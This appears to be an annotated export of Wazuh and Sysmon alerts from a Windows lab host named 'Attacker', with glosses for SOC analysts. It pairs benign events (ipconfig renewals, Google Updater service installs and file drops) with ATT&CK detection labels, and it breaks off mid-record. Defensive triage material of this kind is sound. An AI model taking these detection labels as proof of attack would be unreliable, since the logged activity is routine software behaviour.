data.win.eventdata.parentCommandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Suspicious Windows cmd shell execution Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92032 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087', 'T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery', 'Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery', 'Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534021.574270 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:40.1776576Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 218817 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-20 01:40:40.137
ProcessGuid: {94294ddc-5098-6804-9208-000000000e00}
ProcessId: 9944
Image: C:\Windows\System32\ipconfig.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: IP Configuration Utility
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: ipconfig.exe
CommandLine: C:\WINDOWS\system32\ipconfig /renew
CurrentDirectory: C:\Windows\System32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B
ParentProcessGuid: {94294ddc-5092-6804-8308-000000000e00}
ParentProcessId: 13156
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:40:40.137 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-5098-6804-9208-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9944 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\ipconfig.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: IP Configuration Utility No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: ipconfig.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\ipconfig /renew No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Windows\\System32\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-5092-6804-8308-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13156 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: New Windows Service Created Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61138 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534022.579734 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7045 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:32:37.8788463Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2985 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "A service was installed in the system.
Service Name: Google Updater Service (GoogleUpdaterService137.0.7129.0)
Service File Name: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7129.0\updater.exe" --system --windows-service --service=update
Service Type: user mode service
Service Start Type: auto start
Service Account: LocalSystem" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.serviceName: Google Updater Service (GoogleUpdaterService137.0.7129.0) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.imagePath: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.serviceType: user mode service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.startType: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.accountName: LocalSystem No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534039.582303 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:32:48.8829916Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2398 Incremental log record number – handy for timeline order.
data.win.system.processID: 7908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:48Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-25T22:31:48Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534053.583882 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:58.6481860Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225059 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:40:58.647
ProcessGuid: {94294ddc-50a3-6804-9f08-000000000e00}
ProcessId: 12284
Image: C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe
TargetFilename: C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping12284_1175179416\UpdaterSetup.exe
CreationUtcTime: 2025-04-20 01:40:58.647
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:40:58.647 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50a3-6804-9f08-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_1175179416\\UpdaterSetup.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:40:58.647 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534054.586712 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:59.0804559Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225097 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:40:59.072
ProcessGuid: {94294ddc-50aa-6804-b308-000000000e00}
ProcessId: 10268
Image: C:\WINDOWS\SystemTemp\chrome_Unpacker_BeginUnzipping12284_1175179416\UpdaterSetup.exe
TargetFilename: C:\Windows\SystemTemp\Google10268_165626352\bin\uninstall.cmd
CreationUtcTime: 2025-04-20 01:40:59.072
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:40:59.072 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50aa-6804-b308-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10268 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_1175179416\\UpdaterSetup.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\Google10268_165626352\\bin\\uninstall.cmd No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:40:59.072 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534054.589514 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:59.0805033Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225099 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:40:59.074
ProcessGuid: {94294ddc-50aa-6804-b308-000000000e00}
ProcessId: 10268
Image: C:\WINDOWS\SystemTemp\chrome_Unpacker_BeginUnzipping12284_1175179416\UpdaterSetup.exe
TargetFilename: C:\Windows\SystemTemp\Google10268_165626352\bin\updater.exe
CreationUtcTime: 2025-04-20 01:40:59.074
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:40:59.074 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50aa-6804-b308-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10268 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_1175179416\\UpdaterSetup.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\Google10268_165626352\\bin\\updater.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:40:59.074 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleUpdaterInternalService137.0.7129.0\\ImagePath binary is: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal
🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleUpdaterInternalService137.0.7129.0\\ImagePath binary is: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleUpdaterInternalService137.0.7129.0\\ImagePath binary is: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534054.592308 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:59.3171080Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225118 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-20 01:40:59.311
